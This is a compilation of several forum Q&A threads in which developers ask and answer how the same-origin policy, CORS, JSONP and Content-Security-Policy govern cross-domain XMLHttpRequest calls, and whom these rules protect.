I spent the last 3 days studying how to make a cross domain request using XMLHttpRequest. The best alternative is indeed with JSONP which I am already using.
But I still have a question that I could not find answer nowhere. I read hundreds of posts (including SOs) and nobody has a good liable answer (with nice reference). Hope someone here can help.
Said that, I read in many websites that due to security reasons I cannot make an Ajax request from domain aaa.com to bbb.com and get the data I want. It's very clear and I have no question about that. BUT the problem is when I run the code below in my localhost (so my domain is "localhost" and I should not me able to request any data from another domain).
xhReq = new XMLHttpRequest();
xhReq.open("GET","http://domain.com?parameter",true);
xhReq.send(null);
When I inspect the Firebug Net Tab I realize that the request was not blocked! It was clearly requested. I could not believe. So I created a file in the domain.com/log.php where I could log any request that hit my domain. Surprisingly all the requests I was firing localhost were hitting my domain.com. When I tried to fetch the response I really could not get it due the same origin policy of my Chrome and FIrebug browser. But I was reallyl surprised that the request really hit the webserver despite I could no manipulate the responde.
More surprisingly is that if domain.com/log.php generates a huge responde with like 1MB my firebug showed me that the browser does download ALL th 1MB from the webserver, and at the end it shows a message "Access denied" as expected. So why download all the file if the same origin policy forbids that data to be read.
Finally, I makes me amazed, is that all the websites and specifications I read says very CLEAR that the request is blocked using Ajax when the target domain does not match the source domain. But clearly, with my experiment, the requests are being completed, despite I cannot have access to the response data.
What makes me upset is that it could be open a BIG security hole, in which a website with thousands of views everyday could run this 3 line code and cause a HUGE Ddos attack in an unfriendly website just making the users request a page in another website in small intervals since the browser will not block the request.
I tested this script in IE 7, 8 and 9 and Chrome latest and Firefox latest and the behaviour is the same: the request is done and the browser downloads all the response while not making it avaiblable to do SOP.
Hope someone can explain me why the specs are so wrong about it or what I am understanding wrong!
This happens because the same origin policy is applied on the client side (browser) by evaluating the following access control header values returned from the server:
Access-Control-Allow-Origin
Access-Control-Allow-Methods
Access-Control-Allow-Headers
As you can see, the request must first be completed on the server in order for the browser to inspect the returned headers. This is exactly the reason why your request execute on the server.
You can have a look at Priciples of the Same-Origin Policy by A. Barth.
See bobince's answer at a similar question:
As per XMLHttpRequest level 2, browsers allow cross-origin GETs to be
sent without preflighting, but don't allow the results to be read from
the response unless the remote domain opts in. There is no additional
vulnerability here because you can already cause a GET to an arbitrary
URL to be sent (including query string, for what it's worth) through
multiple more basic interfaces.
For example you have always been able to create an element with
its src set to an address on a remote domain; taking away that
cross-domain ability would break a lot of the existing web.
Related:
Caniuse
XHR2 Spec
Related
So I have been developing a webpage the would give random quotes whenever a user clicks on a button by calling an API.
Please refer to my previous question for more information Not able to get values (quotes) from the API using jquery
I was told that the reason I couldn't get the response from the API is because my ACAS(Access-control-Allow-Origin) is not set properly in my server and I have to debug it.
Now that I don't much about ACAS or CORS. I have some questions. SO here they are:
1. What exactly is ACAS and how is it related to CORS?
2. How do I debug my page and set the ACAS?
3. Does that have to do anything with my jQuery? Or should I configure only my browser.
You can find many documents on the internet
,so I'll just briefly talk about CORS.
When you're sending request to different domain
for example from a.com to b.com, or localhost:8080 to a.com......
your're making a cross-origin HTTP request ,
sometime this is not allowed, for example Ajax (as you're doing) requests.
Because XhttpRequest, Fetch (both are Ajax API) follow same-origin policy, which means by default you can only make requests form the same domain, ex: from site.com to site.com/users.
The reason they follow the same-origin policy is to prevent CSRF attack (Cross-site request forgery).
1.So basically you cannot get the result of cross site Ajax request, it will block by browser because of the security issue, unless the response header Access-control-Allow-Origin is set to allow client's site to send cross site ajax request. ex: Access-control-Allow-Origin:*allow all sites form different domain; Access-control-Allow-Origin:www.b.comonly allow www.b.com domain.
2.Take Chrome for example If the cross site request's result is blocked, it will show on browser's console:
You need to set the response header in your server, for example I set Access-control-Allow-Origin:*, then in browser's "network" console you can see the header is set, and now I can get the Ajax result.
I think nothing should do at client side, all is at server side.
Refer to this post as it makes this clear
Note also that there are some techniques frequently used in order to bypass CORS like setting up a proxy which acts as a relay for your request or using JSONP instead of JSON.
So a couple of days ago i was looking for something like this and had actually found it but never found a use for it. I know its listed somewhere on mozilla's site but i forget what the function is called.
In anycase i wish to request an external domain that doesn't have cors and does not requir external help from things like proxy's. its a rather recent function added to javascript as when i read about it (before i forgot the name) it was listed as expiremental technology. It's supposedly a safe alternative to CORS the only catch is unlike cors you are not allowed to view the response.
What i want to use it for is to basically see if the status code returned is 404 or 200 so i can tell users whether a specific site is having issues and since the ammount of sites that would be requested is huge if i do it server side id prefer to have it done in a clients browser only on specific pages.
I think you could get by with sending a HEAD HTTP request.
I want a simple javascript script that exists on my localhost to make a connection to another domain(eg: anotherdomain.com) with ajax and get the response , but all my browsers tell me that error of (connection blocked , Reason: CORS header 'Access-Control-Allow-Origin' missing)
but when I check the network traffic with network monitor program like (fiddler), I see that the response already came from the server at (anotherdomain.com) to my local machine , it is just my browser who is blocking me from getting it !!
1- can I order my browser to ignore the CORS rules using javascript code?
2- what is my options to overcome this problem? is building a custom client disktop application with c# to send and receive requests freely is the best way to do it?
3- is CORS policy designed to protect the web clients or the web servers ?
thank you, and please consider that I'm complete newbie in web
but when I check the network traffic with network monitor program like (fiddler), I see that the response already came from the server at (anotherdomain.com) to my local machine , it is just my browser who is blocking me from getting it !!
Well for sure, the connection was estabilished to check the presence of the header you mentioned, but data was unlikely to be transferred.
Regarding your questions,
There are 2 options actually. One is to set the Access-Control-Allow-Origin header with proper origin according to yours. The second is to make a JSONP call, though the response of server must support such a solution.
The best option is to have a server with the above header specified. Your server would handle all the network stuff on its side and your script would just get/send some responses/requests.
I would say it designed more to protect the server. Imagine the following situations. Your script on your site makes a lot of POST requests to the another site. Actions like submitting forms etc. could happen and would be allowed. That's harmful, right? You can read about that in this stack question.
This is a concept that I thought I understood, but recently found out I had all wrong. I've looked all around the internet and find plenty of examples of small details and code snippets, but I still lack an understanding of what it prevents and why it prevents it and for whose sake. So this is more of a request for a high-level explanation than a question.
Anyways, here's what I THINK I understand about it:
Let's say I have domain A.com and domain B.com. Each on their own apache servers with their own IP addresses.
I load an html file from domain A.com into a browser. The browser executes a POST XMLHttpRequest to B.com/doStuff.php, which fails because the same-domain-policy was set.
So:
Who's same-domain-policy is relevant? I think the answer is B.com/doStuff.php's... right? So when A sends the request, B checks the request headers for an origin and says "whoops, different domain, won't listen to you". Or does A send the request, B responds with headers that specify "same-domain-policy", and then the browser checks that because same-domain-policy was specified, and the domain from the headers of the A request don't match the one from the B request the BROWSER refuses to send out the xhr?
If that's the case, it seems that the point of not allowing cross-origin-requests is because "I don't want anyone other than me accessing my API". Is that all? Because wouldn't you want to solve that with some kind of authentication instead? Couldn't someone just construct an HTTP request with a fake origin header (simply lie)?
Or is this somehow supposed to protect the user? If that's the case, how is preventing them from calling your API ever going to protect anyone?
I'm so confused...
Who's same-domain-policy is relevant?
The server receiving the request decides.
... the BROWSER refuses to send out the xhr?
No, the server refuses to respond. To be more exact, in modern browsers it is done by preflighted requests. It means that for each cross-origin request, first an OPTIONS request is sent automatically by the browser whose headers are the exact same as the intended request will have but with no request body. The server responds also with headers only. Access-Control headers in the response will let the client browser know whether the request would be fulfilled according to the server's policies. In a sense the browser is preventing the request, but only because it already exchanged a request/response pair with the server and knows that there would be no point to attempt the request. If you forge a request in such a case, the server will still deny serving it.
The idea is that you don't want to access server b from server A via Javascript. If you're interacting with an API, you would use javascript to make a call to your own server's backend code, which would then make a call to the other server.
I was reading about CORS and I think the implementation is both simple and effective.
However, unless I'm missing something, I think there's a big part missing from the spec. As I understand, it's the foreign site that decides, based on the origin of the request (and optionally including credentials), whether to allow access to its resources. This is fine.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site? The foreign site is obviously going to authenticate the request. Hence, again if I'm not missing something, CORS actually makes it easier to steal sensitive information.
I think it would have made much more sense if the original site could also supply an immutable list of servers its page is allowed to access.
So the expanded sequence would be:
Supply a page with list of acceptable CORS servers (abc.com, xyz.com, etc)
Page wants to make an XHR request to abc.com - the browser allows this because it's in the allowed list and authentication proceeds as normal
Page wants to make an XHR request to malicious.com - request rejected locally (ie by the browser) because the server is not in the list.
I know that malicious code could still use JSONP to do its dirty work, but I would have thought that a complete implementation of CORS would imply the closing of the script tag multi-site loophole.
I also checked out the official CORS spec (http://www.w3.org/TR/cors) and could not find any mention of this issue.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site?
What about it? You can already do that without CORS. Even back as far as Netscape 2, you have always been able to transfer information to any third-party site through simple GET and POST requests caused by interfaces as simple as form.submit(), new Image or setting window.location.
If malicious code has access to sensitive information, you have already totally lost.
3) Page wants to make an XHR request to malicious.com - request rejected locally
Why would a page try to make an XHR request to a site it has not already whitelisted?
If you are trying to protect against the actions of malicious script injected due to XSS vulnerabilities, you are attempting to fix the symptom, not the cause.
Your worries are completely valid.
However, more worrisome is the fact that there doesn't need to be any malicious code present for this to be taken advantage of. There are a number of DOM-based cross-site scripting vulnerabilities that allow attackers to take advantage of the issue you described and insert malicious JavaScript into vulnerable webpages. The issue is more than just where data can be sent, but where data can be received from.
I talk about this in more detail here:
http://isisblogs.poly.edu/2011/06/22/cross-origin-resource-inclusion/
http://files.meetup.com/2461862/Cross-Origin%20Resource%20Inclusion%20-%20Revision%203.pdf
It seems to me that CORS is purely expanding what is possible, and trying to do it securely. I think this is clearly a conservative move. Making a stricter cross domain policy on other tags (script/image) while being more secure, would break a lot of existing code, and make it much more difficult to adopt the new technology. Hopefully, something will be done to close that security hole, but I think they need to make sure its an easy transition first.
I also checked out the official CORS spec and could not find any mention of this issue.
Right. The CORS specification is solving a completely different problem. You're mistaken that it makes the problem worse - it makes the problem neither better nor worse, because once a malicious script is running on your page it can already send the data anywhere.
The good news, though, is that there is a widely-implemented specification that addresses this problem: the Content-Security-Policy. It allows you to instruct the browser to place limits on what your page can do.
For example, you can tell the browser not to execute any inline scripts, which will immediately defeat many XSS attacks. Or—as you've requested here—you can explicitly tell the browser which domains the page is allowed to contact.
The problem isn't that a site can access another sites resources that it already had access to. The problem is one of domain -- If I'm using a browser at my company, and an ajax script maliciously decides to try out 10.0.0.1 (potentially my gateway), it may have access simply because the request is now coming from my computer (perhaps 10.0.0.2).
So the solution -- CORS. I'm not saying its the best, but is solves this issue.
1) If the gateway can't return back the 'bobthehacker.com' accepted origin header, the request is rejected by the browser. This handles old or unprepared servers.
2) If the gateway only allows items from the myinternaldomain.com domain, it will reject an ORIGIN of 'bobthehacker.com'. In the SIMPLE CORS case, it will actually still return the results. By default; you can configure the server to not even do that. Then the results are discarded without being loaded by the browser.
3) Finally, even if it would accept certain domains, you have some control over the headers that are accepted and rejected to make the request from those sites conform to a certain shape.
Note -- the ORIGIN and OPTIONS headers are controlled by the requester -- obviously someone creating their own HTTP request can put whatever they want in there. However a modern CORS compliant browser WONT do that. It is the Browser that controls the interaction. The browser is preventing bobthehacker.com from accessing the gateway. That is the part you are missing.
I share David's concerns.
Security must be built layer by layer and a white list served by the origin server seems to be a good approach.
Plus, this white list can be used to close existing loopholes (forms, script tag, etc...), it's safe to assume that a server serving the white list is designed to avoid back compatibility issues.